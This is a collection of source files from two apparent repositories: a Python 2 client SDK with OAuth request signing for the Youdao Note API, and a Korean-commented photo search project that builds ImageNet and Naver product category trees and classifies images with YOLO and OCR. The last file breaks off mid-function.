print books
print '\nget notes in the default notebook\n-----------------------'
note_paths = client.get_note_paths(user.default_notebook)
print note_paths
print '\ncreate notebook\n------------------------'
bookpath = client.create_notebook('book1')
print 'new_book_path='+bookpath
print '\nget note\n----------------------'
note = client.get_note(note_paths[0])
print note.__dict__
print '\ncreate note\n---------------------'
new_note = ynote.Note()
new_note.source = u'lic'
new_note.author = u'lichuan'
new_note.title = u'我是谁?'
new_note.content = u'hehe哈哈哈'
new_note.path = client.create_note(user.default_notebook, new_note)
print "new_note_path="+new_note.path
#pdb.set_trace()
#print '\ncreate incomplete note\n---------------------'
#new_note = ynote.Note()
#new_note.source = None
#new_note.author = u'lichuan'
#new_note.title = u'我是谁?'
#new_note.content = u'hehe哈哈哈'
#new_note.path = client.create_note(user.default_notebook, new_note)
#print "new_note_path="+new_note.path
print '\nupdate note\n--------------------'
new_note.content += u" updated"
client.update_note(new_note)
print '\nmove note\n-------------------'
new_note.path = client.move_note(new_note.path, bookpath)
print 'new_path='+ new_note.path
print '\nshare note\n----------------------'
shared_url = client.share_note(new_note.path)
print 'shared_url='+shared_url
print '\nupload image\n-------------------'
res_file = open('demo_upload.jpg')
res = client.upload_resource(res_file)
res_file.close()
print res.to_resource_tag()
print '\nupdate note with image\n--------------------'
new_note.content += res.to_resource_tag()
client.update_note(new_note)
print '\ndownload image\n--------------------'
image_file = open('demo_download.jpg', 'w')
image_file.write(client.download_resource(res.url))
image_file.close()
print '\ndelete note\n---------------------'
client.delete_note(new_note.path)
new_book_notes = client.get_note_paths(bookpath)
print 'new_book_note_paths:',new_book_notes
print '\ndelete notebook\n-----------------'
client.delete_notebook(bookpath)
--- FILE SEPARATOR ---
#!/usr/bin/env python
from distutils.core import setup
import ynote
if ynote.__version__.endswith('b'):
dev_status = 'Development Status :: 4 - Beta'
else:
dev_status = 'Development Status :: 5 - Production/Stable'
kw=dict(name = 'ynote',
version = ynote.__version__,
description = 'Youdao Note Python SDK',
long_description = open('README', 'r').read(),
author = 'Li Chuan',
author_email = 'daniellee0219@gmail.com',
url = 'https://github.com/daniellee219/youdaonotepy',
download_url = 'https://github.com/daniellee219/youdaonotepy',
packages = ['ynote'],
license = 'Apache License, Version 2.0',
classifiers = [
dev_status,
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet',
'Topic :: Software Development :: Libraries :: Python Modules',
])
setup(**kw)
--- FILE SEPARATOR ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__version__ = "1.0b"
__author__ = "Li Chuan (daniellee0219@gmail.com)"
'''
Python client SDK for Youdao Note API using OAuth 2.
'''
try:
import json
except ImportError:
import simplejson as json
import urllib2, oauth2, time
ENCODING = 'utf-8'
BASE_URL = 'http://sandbox.note.youdao.com/'
OPTIONAL_BASE_URL = 'http://note.youdao.com/'
def _fix_url(url):
if url.startswith(BASE_URL):
return url
else:
return url.replace(OPTIONAL_BASE_URL, BASE_URL)
class User:
"""User class that represents a ynote user."""
def __init__(self, json_dict=None):
'''init with the data from a dictionary.'''
if json_dict:
self.id = json_dict['id']
self.user_name = json_dict['user']
self.total_size = json_dict['total_size']
self.used_size = json_dict['used_size']
self.register_time = int(json_dict['register_time'])
self.last_login_time = int(json_dict['last_login_time'])
self.last_modify_time = int(json_dict['last_modify_time'])
self.default_notebook = json_dict['default_notebook']
else:
self.id = ""
self.user_name = ""
self.total_size = 0
self.used_size = 0
self.register_time = 0
self.last_login_time = 0
self.last_modify_time = 0
self.default_notebook = ""
class Notebook:
"""Notebook class that represents a ynote notebook."""
def __init__(self, json_dict=None):
'''init with the data from a dictionary.'''
if json_dict:
self.path = json_dict['path']
self.name = json_dict['name']
self.notes_num = int(json_dict['notes_num'])
self.create_time = int(json_dict['create_time'])
self.modify_time = int(json_dict['modify_time'])
else:
self.path = ""
self.name = ""
self.notes_num = 0
self.create_time = 0
self.modify_time = 0
class Note:
"""Note class that represents a ynote note."""
def __init__(self, json_dict=None):
'''init with the data from a dictionary.'''
if json_dict:
self.path = json_dict['path']
self.title = json_dict['title']
self.author = json_dict['author']
self.source = json_dict['source']
self.size = int(json_dict['size'])
self.create_time = int(json_dict['create_time'])
self.modify_time = int(json_dict['modify_time'])
self.content = json_dict['content']
else:
self.path = ""
self.title = ""
self.author = ""
self.source = ""
self.size = 0
self.create_time = -1
self.modify_time = -1
self.content = ""
class Resource:
"""Resource class that represents a resource in a note."""
def __init__(self, json_dict):
'''init with the data from a dictionary.'''
if json_dict:
self.url = _fix_url(json_dict['url'])
if json_dict.has_key('src'):
self.icon = _fix_url(json_dict['src'])
else:
self.icon = ""
else:
self.url = ""
self.icon = ""
def to_resource_tag(self):
'''convert to an html tag'''
if self.icon:
return "<img path=\"%s\" src=\"%s\" />" % (self.url,self.icon)
else:
return "<img src=\"%s\" />" % self.url
class YNoteError(StandardError):
'''
SDK error class that represents API error as well as http error
'''
def __init__(self, error_type, error_code, message):
'''init with error code and message.'''
self.error_msg = message
self.error_code = int(error_code)
self.error_type = error_type
StandardError.__init__(self, message)
def __str__(self):
'''convert to a string.'''
return "YNoteError: type=%s, code=%d, message=%s" % (self.error_type, self.error_code, self.error_msg)
def _parse_api_error(body):
'''parse an YNote API error to YNoteError object'''
json_obj = json.loads(body)
return YNoteError('API_ERROR', int(json_obj['error']), json_obj['message'])
def _parse_http_error(e):
'''parse an urllib2.HTTPError object to YNoteError object'''
return YNoteError('HTTP_ERROR', e.code, e.reason)
def _parse_urlencoded(body):
'''parse an urlencoded string to dictionary'''
parts = body.split('&')
return dict([tuple(part.split('=')) for part in parts])
def _do_http(request):
'''initiate an http request.'''
try:
resp = urllib2.urlopen(request)
return resp.read()
except urllib2.HTTPError, e:
if e.code == 500:
raise _parse_api_error(e.read())
else:
raise _parse_http_error(e)
def _do_get(url, params, consumer, token):
'''
initiate an http GET request, return result as a string or raise error.
'''
req_builder = oauth2.RequestBuilder(oauth2.HTTP_GET, url, params)
req = req_builder.build_signed_request(consumer, token)
return _do_http(req)
def _do_post(url, params, consumer, token):
'''
initiate an http POST request with urlencoded content,
return result as string or raise error.
'''
return _do_post_urlencoded(url, params, consumer, token)
def _do_post_urlencoded(url, params, consumer, token):
'''
initiate an http POST request with urlencoded content,
return result as string or raise error.
'''
req_builder = oauth2.RequestBuilder(oauth2.HTTP_POST_URLENCODED, url, params)
req = req_builder.build_signed_request(consumer, token)
return _do_http(req)
def _do_post_multipart(url, params, consumer, token):
'''
initiate an http POST request with multipart content,
return result as string or raise error.
'''
req_builder = oauth2.RequestBuilder(oauth2.HTTP_POST_MULTIPART, url, params)
req = req_builder.build_signed_request(consumer, token)
return _do_http(req)
class YNoteClient:
"""API client for Youdao Note."""
def __init__(self, consumer_key, consumer_secret):
'''init with consumer key and consumer secret.'''
self.consumer = oauth2.Consumer(consumer_key, consumer_secret)
self.access_token = None
self.request_token = None
def grant_request_token(self, callback_url):
'''get request token(store in self.request_token), return authorization url.'''
if callback_url:
params = {'oauth_callback':callback_url}
else:
params = {'oauth_callback':'oob'}
res = _do_get(BASE_URL+'oauth/request_token', params, self.consumer, None)
res_dict = _parse_urlencoded(res)
self.request_token = oauth2.Token(res_dict['oauth_token'], res_dict['oauth_token_secret'])
auth_url = BASE_URL + 'oauth/authorize?oauth_token=' + self.request_token.key
if callback_url:
auth_url += '&oauth_callback=' + callback_url
return auth_url
def grant_access_token(self, verifier):
'''get access token(store in self.access_token).'''
params = {
'oauth_token':self.request_token.key,
'oauth_verifier':verifier
}
res = _do_get(BASE_URL+'oauth/access_token', params, self.consumer, self.request_token)
res_dict = _parse_urlencoded(res)
self.access_token = oauth2.Token(res_dict['oauth_token'], res_dict['oauth_token_secret'])
def set_access_token(self, token_key, token_secret):
'''set the access token'''
self.access_token = oauth2.Token(token_key, token_secret)
def get_access_token(self):
'''get current access token as key,secret'''
if self.access_token:
return self.access_token.key, self.access_token.secret
else:
return "", ""
def get_user(self):
'''get user information, return as a User object.'''
res = _do_get(BASE_URL+'yws/open/user/get.json', None, self.consumer, self.access_token)
return User(json.loads(res))
def get_notebooks(self):
'''get all notebooks, return as a list of Notebook objects.'''
res = _do_post(BASE_URL+'yws/open/notebook/all.json', None, self.consumer, self.access_token)
return [Notebook(d) for d in json.loads(res)]
def get_note_paths(self, book_path):
'''get path of all notes in a notebook, return as a list of path strings.'''
params = {'notebook':book_path}
res = _do_post(BASE_URL+'yws/open/notebook/list.json', params, self.consumer, self.access_token)
return json.loads(res)
def create_notebook(self, name, create_time=None):
'''create a notebook with specified name.'''
params = {'name':name}
if create_time:
params['create_time'] = create_time
res = _do_post(BASE_URL+'yws/open/notebook/create.json', params, self.consumer, self.access_token)
return json.loads(res)['path']
def delete_notebook(self, path):
'''delete a notebook with specified path.'''
params = {'notebook':path}
res = _do_post(BASE_URL+'yws/open/notebook/delete.json', params, self.consumer, self.access_token)
def get_note(self, path):
'''get a note with specified path, return as a Note object.'''
params = {'path':path}
res = _do_post(BASE_URL+'yws/open/note/get.json', params, self.consumer, self.access_token)
return Note(json.loads(res))
def create_note(self, book_path, note):
'''create a note in a notebook with information specified in "note".'''
params = {
'source':note.source,
'author':note.author,
'title':note.title,
'content':note.content,
'notebook':book_path
}
res = _do_post_multipart(BASE_URL+'yws/open/note/create.json', params, self.consumer, self.access_token)
return json.loads(res)['path']
def create_note_with_attributes(self, book_path, content, **kw):
'''create a note with attributes given by parameters'''
params = { 'notebook':book_path, 'content':content }
if 'source' in kw.keys():
params['source'] = kw['source']
if 'author' in kw.keys():
params['author'] = kw['author']
if 'title' in kw.keys():
params['title'] = kw['title']
if 'create_time' in kw.keys():
params['create_time'] = kw['create_time']
res = _do_post_multipart(BASE_URL+'yws/open/note/create.json', params, self.consumer, self.access_token)
return json.loads(res)['path']
def update_note(self, note, modify_time=None):
'''update the note with information in "note".'''
params = {
'path':note.path,
'source':note.source,
'author':note.author,
'title':note.title,
'content':note.content,
}
if modify_time:
params['modify_time'] = modify_time
_do_post_multipart(BASE_URL+'yws/open/note/update.json', params, self.consumer, self.access_token)
def update_note_attributes(self, note_path, **kw):
'''update the some attributes(given by kw) of the note.'''
params = {'path':note_path}
if 'source' in kw.keys():
params['source'] = kw['source']
if 'author' in kw.keys():
params['author'] = kw['author']
if 'title' in kw.keys():
params['title'] = kw['title']
if 'content' in kw.keys():
params['content'] = kw['content']
if 'modify_time' in kw.keys():
params['modify_time'] = kw['modify_time']
_do_post_multipart(BASE_URL+'yws/open/note/update.json', params, self.consumer, self.access_token)
def move_note(self, note_path, book_path):
'''move note to the notebook with path denoted by "book_path".'''
params = {
'path':note_path,
'notebook':book_path
}
res = _do_post(BASE_URL+'yws/open/note/move.json', params, self.consumer, self.access_token)
return json.loads(res)['path']
def delete_note(self, note_path):
'''delete a note with specified path.'''
params = {'path':note_path}
res = _do_post(BASE_URL+'yws/open/note/delete.json', params, self.consumer, self.access_token)
def share_note(self, note_path):
'''share a note with specified path, return shared url.'''
params = {'path':note_path}
res = _do_post(BASE_URL+'yws/open/share/publish.json', params, self.consumer, self.access_token)
return _fix_url(json.loads(res)['url'])
def upload_resource(self, res_file):
'''upload a file as a resource.'''
params = {'file':res_file}
res = _do_post_multipart(BASE_URL+'yws/open/resource/upload.json', params, self.consumer, self.access_token)
return Resource(json.loads(res))
def download_resource(self, resource_url):
'''download a resource file with specified url, return as a string.'''
res = _do_get(resource_url, None, self.consumer, self.access_token)
return res
--- FILE SEPARATOR ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__version__ = "1.0b"
__author__ = "Li Chuan (daniellee0219@gmail.com)"
'''
OAuth2 module for Youdao Note client SDK.
'''
import binascii
import time
import random
import urllib
import urllib2
import hmac
import collections
def _escape(s):
"""Special replacement."""
return urllib.quote(s, safe='~')
def _generate_timestamp():
"""Get seconds since epoch (UTC)."""
return int(time.time())
def _generate_nonce(length=15):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
def _encode_urlencoded(params):
'''build urlencoded body.'''
args = []
for k, v in params.iteritems():
if isinstance(v, basestring):
qv = v.encode('utf-8') if isinstance(v, unicode) else v
args.append('%s=%s' % (k, _escape(qv)))
elif isinstance(v, collections.Iterable):
for i in v:
qv = i.encode('utf-8') if isinstance(i, unicode) else str(i)
args.append('%s=%s' % (k, _escape(qv)))
else:
qv = str(v)
args.append('%s=%s' % (k, _escape(qv)))
return '&'.join(args)
def _encode_multipart(params):
'''build a multipart/-data body with randomly generated boundary.'''
boundary = '----------%s' % hex(int(time.time() * 1000))
data = []
for k, v in params.iteritems():
data.append('--%s' % boundary)
if hasattr(v, 'read'):
# file-like object:
filename = getattr(v, 'name', '')
data.append('Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (k, filename))
data.append(v.read() if v else "")
else:
data.append('Content-Disposition: form-data; name="%s"\r\n' % k)
if v:
data.append(v.encode('utf-8') if isinstance(v, unicode) else v)
else:
data.append("")
data.append('--%s--\r\n' % boundary)
return '\r\n'.join(data), boundary
class Consumer:
'''Consumer with key and secret'''
def __init__(self, key, secret):
self.key = key
self.secret = secret
class Token:
'''Token with key and secret'''
def __init__(self, key, secret):
self.key = key
self.secret = secret
#Request types
HTTP_GET = 0
HTTP_POST_URLENCODED = 1
HTTP_POST_MULTIPART = 2
def _get_method(request_type):
'''get method name for request type.'''
try:
return ['GET', 'POST', 'POST'][request_type]
except:
return ''
class RequestBuilder(dict):
'''OAuth request builder'''
def __init__(self, request_type, url, extra_params=None):
'''init request builder'''
self.request_type = request_type
self.url = url
if extra_params is not None:
self.update(extra_params)
def _sign(self, consumer, token):
'''fill request with OAuth fields including signature.'''
self['oauth_consumer_key'] = consumer.key
if token:
self['oauth_token'] = token.key
self['oauth_timestamp'] = _generate_timestamp()
self['oauth_nonce'] = _generate_nonce()
self['oauth_version'] = '1.0'
self['oauth_signature_method'] = SignatureMethod_HMAC_SHA1.name
signature = SignatureMethod_HMAC_SHA1.sign(self, consumer, token)
self['oauth_signature'] = signature
def get_normalized_parameters(self):
'''
build a string that contains the parameters that must be signed.
'''
if self.request_type == HTTP_POST_URLENCODED:
items = [(k, v) for k, v in self.items() if k != 'oauth_signature']
else:
items = [(k, v) for k, v in self.items() if k.startswith('oauth_') and k != 'oauth_signature']
encoded_str = urllib.urlencode(sorted(items), True)
return encoded_str.replace('+', '%20')
def _get_auth_header(self):
'''Get the header(as dict) named "Authorization"'''
oauth_params = ((k, v) for k, v in self.items()
if k.startswith('oauth_'))
stringy_params = ((k, _escape(str(v))) for k, v in oauth_params)
header_params = ('%s="%s"' % (k, v) for k, v in stringy_params)
params_header = ', '.join(header_params)
auth_header = 'OAuth'
if params_header:
auth_header = "%s %s" % (auth_header, params_header)
return auth_header
def _get_urlencoded_body(self):
'''get body for urlencoded post requests'''
body_params = dict([(k, v) for k, v in self.items()
if not k.startswith('oauth_')])
if not body_params:
return ''
return _encode_urlencoded(body_params)
def _get_multipart_body_boundary(self):
'''get body,boundary for multipart post requests'''
body_params = dict([(k,v) for k,v in self.items()
if not k.startswith('oauth_')])
if not body_params:
return ''
return _encode_multipart(body_params)
def build_signed_request(self, consumer, token):
'''
build a request signed by consumer and token, return request as instance of urllib2.Request.
'''
self._sign(consumer, token)
if self.request_type == HTTP_GET:
req = urllib2.Request(self.url, None)
elif self.request_type == HTTP_POST_URLENCODED:
body = self._get_urlencoded_body()
req = urllib2.Request(self.url, body)
req.add_header('Content-Type', 'application/x-www-form-urlencoded')
else:
body, boundary = self._get_multipart_body_boundary()
req = urllib2.Request(self.url, body)
req.add_header('Content-Type', 'multipart/form-data; boundary=%s; charset=UTF-8' % boundary)
req.add_header('Authorization', self._get_auth_header())
return req
class SignatureMethod_HMAC_SHA1:
name = 'HMAC-SHA1'
@classmethod
def _signing_base(cls, request, consumer, token):
'''build key and base string for request builder.'''
sig = (
_escape(_get_method(request.request_type)),
_escape(request.url),
_escape(request.get_normalized_parameters()),
)
key = '%s&' % _escape(consumer.secret)
if token:
key += _escape(token.secret)
base_string = '&'.join(sig)
return key, base_string
@classmethod
def sign(cls, request, consumer, token):
"""calculate the signature for the request builder."""
key, base_string = cls._signing_base(request, consumer, token)
# HMAC object.
try:
import hashlib # 2.5
hashed = hmac.new(key, base_string, hashlib.sha1)
except ImportError:
import sha # Deprecated
hashed = hmac.new(key, base_string, sha)
# Calculate the digest base 64.
return binascii.b2a_base64(hashed.digest())[:-1]
|
[
"/demo.py",
"/setup.py",
"/ynote/__init__.py",
"/ynote/oauth2.py"
] |
0319easy/SearchPicture
|
'''
filePathGetter
파일 경로 리턴해주는 static 클래스
파일
1. 네이버상품트리 파일
2. 이미지넷 계층트리 파일
3. 이미지가 있는 디렉토리
4. 트레이닝 이미지가 있는 디렉토리
5. 데이터베이스 파일
'''
import os
class FilePathGetter:
@staticmethod
def getNaverGoodsTreeFilePath():
return "NaverGoodsTree.txt"
@staticmethod
def getImageNetTreeFilePath():
return "ImageNetTree.txt"
@staticmethod
def getImageDirPath():
return f'{os.path.abspath(os.getcwd())}\image'
@staticmethod
def getTrainingImageDirPath():
return "training_img"
@staticmethod
def getDBName():
return "photo_data"
--- FILE SEPARATOR ---
from anytree import Node, RenderTree
import HierarchyTree.ImagenetClassFilter as ImagenetClassFilter
import HierarchyTree.NaverGoodsTreeConverter as NaverGoodsTreeConverter
#import ImagenetClassFilter
#import NaverGoodsTreeConverter
'''
HierarchyTree
계층트리 클래스
기능
1. 트리 생성
2. 키워드로 노드 검색 후 연결된 노드들 리턴(부모 노드들, 자신, 자식 노드들)
3. 트리 전체 출력
'''
# TODO : ImageNet Tree 붙여서 구성하기
class HierarchyTree:
def __init__(self, hierarchyTree, trainingLabel, wnid2name):
self.hierarchyTreeFile = hierarchyTree
self.node_set = []
self.content = {}
self.icFilter = ImagenetClassFilter.ImagenetClassFilter(trainingLabel, wnid2name)
self.ngtConverter = NaverGoodsTreeConverter.NaverGoodsTreeConverter()
def makeHierarchyTree(self):
self.icFilter.makeTrainingLabelSet()
self.icFilter.makeWnid2NameMap()
f = open(self.hierarchyTreeFile, 'r', encoding='UTF-8')
self.node_set.append(Node(0, data="root/"))
self.node_set.append(Node(1, data="n00001740/entity/", parent=self.node_set[0]))
self.node_set.append(Node(2, data="상품/", parent=self.node_set[0]))
self.content["root/"] = 0
self.content["n00001740/entity/"] = 1
self.content["상품/"] = 2
while True:
dat = f.readline()
if not dat: break
dat = dat.replace("\n", "", 1)
parent = dat.split()[0]
child = dat.split()[1]
if not self.checkIfKeyExists((parent, child)):
continue
parent = self.getData(parent)
child = self.getData(child)
if parent not in self.content.keys():
self.content[parent] = len(self.node_set)
self.node_set.append(Node(len(self.node_set), data=parent))
if child in self.content.keys():
self.node_set[self.content[child]].parent = self.node_set[self.content[parent]]
continue
self.content[child] = len(self.node_set)
self.node_set.append(Node(len(self.node_set), data=child, parent=self.node_set[self.content[parent]]))
f.close()
# self.showTree()
for row in RenderTree(self.node_set[0]):
pre, fill, node = row
if node.is_leaf:
if self.is_in_training_dataset(node.data):
continue
else:
parent_node = node.parent
node.parent = None
del node
while(len(parent_node.children) == 0 and not self.is_in_training_dataset(parent_node.data)):
tmp_node = parent_node.parent
parent_node.parent = None
del parent_node
parent_node = tmp_node
def is_in_training_dataset(self, keyword):
return True
# if keyword[0] != "n" or self.icFilter.is_name_in_trainingLabel(keyword):
# return True
# else:
# return False
def getData(self, wnid):
if wnid[0] != "n":
return wnid
return wnid + "/" + self.icFilter.getData(wnid) + "/"
def checkIfKeyExists(self, key):
if key[0][0] != "n":
return True
if self.icFilter.check_wnid_in_wnid2key(key[0]) and self.icFilter.check_wnid_in_wnid2key(key[1]):
return True
else:
return False
def searchKeyword(self, keyword):
for row in RenderTree(self.node_set[0]):
pre, fill, node = row
if "/" + keyword + "/" in node.data:
return self.getRelatedNodes(node)
def getRelatedNodes(self, node):
result = []
result += self.getParents(node)
result += self.getChildren(node)
return result
def getChildren(self, node):
children = []
for row in RenderTree(node):
pre, fill, node = row
children.append(node.data)
break
return children
def getParents(self, node):
parents = []
while True:
if node.parent:
parents.append(node.parent.data)
node = node.parent
else:
break
return parents
def showTree(self):
print("==" * 20)
print("==" * 8 + "트리정보" + "==" * 8)
print("==" * 20)
for row in RenderTree(self.node_set[0]):
pre, fill, node = row
print(f"{pre}{node.name}, data: {node.data}")
print("==" * 20)
def showTreeP2Cformat(self):
with open("NaverGoodsTreeP2C.txt", "w", encoding="UTF-8") as f:
for row in RenderTree(self.node_set[0]):
pre, fill, node = row
if node.data == "상품":
continue
f.write(f"{node.parent.data} {node.data}\n")
if __name__ == "__main__":
ht = HierarchyTree("HierarchyTree.dat", "Imagenet.txt", "wnid2name.txt")
ht.makeHierarchyTree()
# print(f'keyword : 옷의류 result : {ht.searchKeyword("패션의류")}')
# print(f'keyword : 러닝 result : {ht.searchKeyword("러닝")}')
# print(f'keyword : 신발 result : {ht.searchKeyword("신발")}')
# print(f'keyword : cat result : {ht.searchKeyword("cat")}')
ht.showTree()
--- FILE SEPARATOR ---
import sqlite3
import re
from anytree import Node, RenderTree
class ImagenetClassFilter:
def __init__(self, training_label, wnid2name):
self.trainingLabelFilePath = training_label
self.wnid2nameFilePath = wnid2name
self.trainingLabel = []
self.wnid2name = {}
def makeTrainingLabelSet(self):
self.trainingLabel = []
with open(self.trainingLabelFilePath, "r") as training_f:
while True:
line = training_f.readline()
if not line:
break
pattern = None
if line[-3] == "\"":
pattern = re.compile(r"\".*\"")
else:
pattern = re.compile(r"\'.*\'")
m = pattern.search(line.replace("\n",""))
self.trainingLabel.append(str(m.group()).replace(", ", "/", len(str(m.group)))[1:-1] + "/")
def writeTrainingLabels2File(self):
with open("training_label.dat","w") as f:
for wnid, name in self.wnid2name.items():
if self.changeFormat(name) in self.trainingLabel:
f.write(wnid)
f.write(" ")
f.write(self.changeFormat(name))
f.write("\n")
def makeWnid2NameMap(self):
with open(self.wnid2nameFilePath, "r") as f:
while True:
line = f.readline()
if not line:
break
self.wnid2name[line[:self.getLenWnid()]] = self.changeFormat(line[self.getLenWnid()+1:])
def changeFormat(self, name):
return name.replace(", ", "/", len(name)).replace("\n","")
def check_wnid_in_wnid2key(self, wnid):
if wnid[0] != "n" or wnid in self.wnid2name.keys():
return True
else:
return False
def is_name_in_trainingLabel(self, name):
return True
# if name[0] != "n" or name[self.getLenWnid()+1 : ] in self.trainingLabel:
# return True
# else:
# return False
def is_wnid_in_trainingLabel(self, wnid):
return True
# if wnid[0] != "n" or wnid[:self.getLenWnid()] in self.trainingLabel:
# return True
# else:
# return False
def getData(self, wnid):
if wnid in self.wnid2name.keys():
return self.wnid2name[wnid]
else:
return None
def getLenWnid(self):
return len("n00000000")
if __name__ == "__main__":
icFilter = ImagenetClassFilter("Imagenet.txt", "wnid2name.txt")
icFilter.makeTrainingLabelSet()
icFilter.makeWnid2NameMap()
for val in icFilter.trainingLabel:
print(val)
# for key, val in icFilter.wnid2name.items():
# print(key," ", val)
print(icFilter.is_name_in_trainingLabel("junco/snowbird"))
print(icFilter.getData("n02404186"))
icFilter.writeTrainingLabels2File()
--- FILE SEPARATOR ---
import re
from anytree import Node, RenderTree
'''
NaverGoodsTreeConverter
기능
tab으로 이루어진 트리를 parent child 포맷으로 출력시켜준다.
makeContent()
makeTree()
하면 트리가 만들어진다.
showTree()
하면 트리 출력
showTreeP2Cformat()
하면 parent child 포맷으로 출력
'''
class NaverGoodsTreeConverter:
def __init__(self):
self.naverGoodsPath = "NaverGoodsTree.txt"
self.targetPath = "NaverGoodsTreeP2C.txt"
self.node_set = []
self.content = []
def makeContent(self):
f = open(self.naverGoodsPath, 'r', encoding='UTF8')
while True:
line = f.readline()
if not line: break
self.content.append((line.count("\t"), line.replace("\n", "").replace("\t", "", len(line))))
f.close()
def makeTree(self):
self.makeContent()
self.node_set.append(Node(f'node_{0}', data=self.content[0][1]))
self.makeTree_sub(0)
def makeTree_sub(self, nodeNum):
while True:
if (len(self.content) == len(self.node_set)) or (
self.content[nodeNum][0] > self.content[len(self.node_set)][0] - 1):
return
elif self.content[nodeNum][0] == self.content[len(self.node_set)][0] - 1:
self.node_set.append(Node(f'node_{len(self.node_set)}', parent=self.node_set[nodeNum],
data=self.content[len(self.node_set)][1]))
elif self.content[nodeNum][0] < self.content[len(self.node_set)][0] - 1:
self.makeTree_sub(len(self.node_set) - 1)
def showTree(self):
print("==" * 20)
print("==" * 8 + "트리정보" + "==" * 8)
print("==" * 20)
for row in RenderTree(self.node_set[0]):
pre, fill, node = row
print(f"{pre}{node.name}, data: {node.data}")
print("==" * 20)
def showTreeP2Cformat(self):
with open(self.targetPath, "w", encoding="UTF-8") as f:
for row in RenderTree(self.node_set[0]):
pre, fill, node = row
if node.data == "상품":
continue
f.write(f"{node.parent.data} {node.data}\n")
if __name__ == "__main__":
ngtc = NaverGoodsTreeConverter()
ngtc.makeContent()
ngtc.makeTree()
ngtc.showTree()
--- FILE SEPARATOR ---
import cv2
#from HierarchyTree import HierarchyTree
import Launcher
from HierarchyTree import HierarchyTree
from Yolo import Yolo
import ImageGetter as GI
import text.TesseractOCR as TesseractOCR
import threading
import Logger
from Yolo.Yolo_cmd import Yolo_cmd
'''
ImageClassifier
이미지 분류기
기능
1. 특정 directory 안에 있는 이미지 읽어오기
2. 이미지 classify
'''
#TODO : 1. OCR 적용 2. batch 적용
class ImageClassifier():
def __init__(self, user_id, logger):
threading.Thread.__init__(self)
self.imageGetter = GI.ImageGetter(user_id)
self.fileList = self.imageGetter.getFileList(logger)
self.textAnalyzer = TesseractOCR.TesseractOCR()
# self.objClassifier = Yolo.Yolo('Yolo\darknet\yolo9000\yolo9000.weights', 'Yolo\darknet\yolo9000\yolo9000_2.cfg','Yolo\darknet\yolo9000\9k.names')
self.objClassifier = Yolo.Yolo('..\Yolo\yolov3.weights', '..\Yolo\yolov3.cfg', '..\Yolo\yolov3.txt')
self.hierarchyTree = HierarchyTree.HierarchyTree("..\HierarchyTree\HierarchyTree.dat", "..\HierarchyTree/Imagenet.txt", "..\HierarchyTree/wnid2name.txt")
self.hierarchyTree.makeHierarchyTree()
self.Yolo_sub = Yolo_cmd('C:/Users\yjm6560\Desktop\yjm6560\CE\graduation_project\SearchPicture\Yolo\darknet\yolo9000\input.txt',
'C:/Users\yjm6560\Desktop\yjm6560\CE\graduation_project\SearchPicture\Yolo\darknet/ret.txt')
def readImages(self):
imageList = []
for i in self.fileList:
imageList.append(cv2.imread(i))
if Launcher.DEBUG:
print(f'read {len(imageList)} images')
return imageList
#TODO: yolo batch operation만 적용된 상태. ocr 적용하면 바꿔줘야 함
def classifyObjImagesByBatch(self, logger, batch_size=8):
image_list = self.readImages()
for i in range(int(len(self.fileList)/batch_size)+1):
if i*batch_size == len(self.fileList):
break
elif (i+1)*batch_size > len(self.fileList):
ret = self.objClassifier.detectObj_in_Images(image_list[i*batch_size :], len(self.fileList)-(i*batch_size))
else:
ret = self.objClassifier.detectObj_in_Images(image_list[i*batch_size : (i+1)*batch_size], batch_size)
for j in range(len(ret)):
order = i*batch_size + j
if Launcher.DEBUG:
print(f'{order} : {ret[j]}')
print(f'\t{self.getRelatedClasses(ret[j])}')
logger.insertNonTextyPhoto(order, self.fileList[order], self.getRelatedClasses(ret[j]))
def classifyObjImages_sub(self, logger, batch_size=8):
img_path_f = open(self.Yolo_sub.img_list, "w+")
for img_path in self.fileList:
img_path_f.write(img_path + "\n")
img_path_f.close()
self.Yolo_sub.writeDetectRet()
ret = self.Yolo_sub.getObjList()
if Launcher.DEBUG:
print(f"RESULT : {ret}")
for i in range(len(ret)):
if Launcher.DEBUG:
print(f'{self.getRelatedClasses(ret[i][1])}')
logger.insertNonTextyPhoto(i, self.fileList[i], self.getRelatedClasses(ret[i][1]))
def analyzeTextImages(self, logger, batch_size=8):
image_list = self.readImages()
for i in range(0, len(image_list)):
# logger.insertTextyPhoto(i, self.fileList[i], self.textAnalyzer.single_ocr(image_list[i], "none"))
logger.insertTextyPhoto(i, self.fileList[i], self.textAnalyzer.findTextOnImage(image_list[i]))
def analyzeTextImagesByBatch(self, logger, batch_size=8):
image_list = self.readImages()
for i in range(int(len(self.fileList) / batch_size) + 1):
if i * batch_size == len(self.fileList):
break
elif (i + 1) * batch_size > len(self.fileList):
ret = self.textAnalyzer.findTextOnImage(image_list[i * batch_size:], len(self.fileList) - (i * batch_size))
else:
ret = self.textAnalyzer.findTextOnImage(image_list[i * batch_size: (i + 1) * batch_size], batch_size)
for j in range(len(ret)):
order = i * batch_size + j
logger.insertTextyPhoto(order, self.fileList[order], [], ret[j])
def classifyImages(self):
# Not batch Operation
image_list = self.readImages()
tag_list = []
for i in range(0, len(self.fileList)):
tag_list.append((i, self.fileList[i], self.getRelatedClasses(self.objClassifier.detectObj_in_Image(image_list[i])), self.textAnalyzer.ocr([image_list[i]])))
if Launcher.DEBUG:
print(self.fileList[i],self.objClassifier.detectObj_in_Image(image_list[i]))
return tag_list
def getRelatedClasses(self, keywords):
ret = []
for key in keywords:
try:
ret += self.hierarchyTree.searchKeyword(key)
except:
continue
ret = list(set(ret))
return ret
if __name__ == "__main__":
IC = ImageClassifier('easy')
# result = IC.classifyImagesByBatch()
result = IC.classifyImages()
for dat in result:
print(dat[2])
--- FILE SEPARATOR ---
import numpy as np
import cv2
import sys
import os
import Launcher
from FilePath import FilePathGetter
'''
ImageGetter
디렉토리 내의 이미지 경로들을 가져오는 클래스
'''
class ImageGetter:
def __init__(self, user_id):
self.path_dir = FilePathGetter.getImageDirPath() + "\\" + user_id
def setDirPath(self, path):
self.path_dir = path
def getDirPath(self):
return self.path_dir
def getFileList(self, logger):
file_name_list = os.listdir(self.path_dir)
